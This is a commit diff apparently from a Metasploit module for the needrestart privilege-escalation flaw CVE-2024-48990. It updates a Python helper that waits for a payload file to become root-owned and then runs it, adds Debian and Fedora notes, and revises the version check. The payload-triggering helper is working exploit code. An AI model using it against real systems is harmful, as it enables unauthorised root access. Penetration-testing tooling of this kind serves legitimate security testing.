needrestart exploit updates

Author: h00die

data/exploits/CVE-2024-48990/sleeper.py

@@ -8,10 +8,10 @@
     try:
         file_stat = os.stat('PAYLOAD_PATH')
     except FileNotFoundError:
-        break
+        exit()
     username = pwd.getpwuid(file_stat.st_uid).pw_name
+    #print(f"Payload owned by: {username}. Stats: {file_stat}")
     if (username == 'root'):
-        #print("Payload owned by: " + username)
-        os.system('PAYLOAD_PATH')
-        break
+        os.system('PAYLOAD_PATH &')
+        exit()
     time.sleep(1)

documentation/modules/exploit/linux/local/ubuntu_needrestart_lpe.md

@@ -6,12 +6,22 @@ attacker-controlled PYTHONPATH environment variable.
 
 Verified against Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1
 
+Exploitation against vulnerable needrestart versions on
+Debian 12 and Fedora 39 were unsuccessful
+however install and run instructions are listed below.
+
 ### Debian 
 
 Install: `apt-get install needrestart=3.6-4+deb12u1`
 
 Binary location: `/usr/sbin/needrestart`
 
+### Fedora 39
+
+Install: `dnf install needrestart-3.6-9.fc39.noarch`
+
+Binary location: `/usr/sbin/needrestart`
+
 ## Verification Steps
 
 1. Install the application

modules/exploits/linux/local/ubuntu_needrestart_lpe.rb

@@ -26,6 +26,7 @@ def initialize(info = {})
           attacker-controlled PYTHONPATH environment variable.
 
           Verified against Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1
+          Attempted exploitation against Debian 12, expliotation failed
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -74,20 +75,22 @@ def check
       '16.04' => Rex::Version.new('2.6-1ubuntu0.1.esm1'),
       '12' => Rex::Version.new('3.6-4.deb12u2'), # debian bookworm
       '11' => Rex::Version.new('3.5-4.deb11u4'), # debian bullseye
-      '41' => Rex::Version.new('3.8-1.fc41') # fedora 41
+      # may be more versions, but this felt good enough
+      '38' => Rex::Version.new('3.8-1'),
+      '39' => Rex::Version.new('3.8-1'),
+      '40' => Rex::Version.new('3.8-1'),
+      '41' => Rex::Version.new('3.8-1')
     }
     info = get_sysinfo
-    return CheckCode::Safe('Only Ubuntu/Debian/Fedora have check functionality') unless ['debian', 'ubuntu', 'Fedora'].include? info[:distro]
+    return CheckCode::Safe('Only Ubuntu/Debian/Fedora have check functionality') unless ['debian', 'ubuntu', 'fedora'].include? info[:distro]
 
     if info[:distro] == 'ubuntu'
       version = info[:version].split(' ')[1].slice(0, 5) # take off any extra version info
       return CheckCode::Safe("Ubuntu version #{version} is not vulnerable or untested") unless fixed_versions.key? version
     elsif info[:distro] == 'debian'
-      version = info[:version].split(' ')[2]
-      return CheckCode::Safe("Debian version #{version} is not vulnerable or untested") unless fixed_versions.key? version
-    elsif info[:distro] == 'Fedora' # untested XXX need to confirm
-      version = info[:version].split(' ')[1]
-      return CheckCode::Safe("Fedora version #{version} is not vulnerable or untested") unless fixed_versions.key? version
+      return CheckCode::Safe('Debian may be vulnerable however the exploit does not work against it')
+    elsif info[:distro] == 'fedora'
+      return CheckCode::Safe('Fedora may be vulnerable however the exploit does not work against it')
     end
 
     return CheckCode::Safe('needrestart binary not found') unless command_exists?('needrestart')
@@ -99,9 +102,9 @@ def check
     package = Rex::Version.new(package)
     return CheckCode::Safe('needrestart not install, or not detected.') if package.nil?
 
-    return CheckCode::Appears("Vulnerable needrestart version #{package} detected on Ubuntu/Debian/Fedora #{version}") if package < fixed_versions[version]
+    return CheckCode::Appears("Vulnerable needrestart version #{package} detected on Ubuntu #{version}") if package < fixed_versions[version]
 
-    CheckCode::Safe("needrestart is not vulnerable on Ubuntu/Debian/Fedora #{version}")
+    CheckCode::Safe("needrestart is not vulnerable on Ubuntu #{version}")
   end
 
   def exploit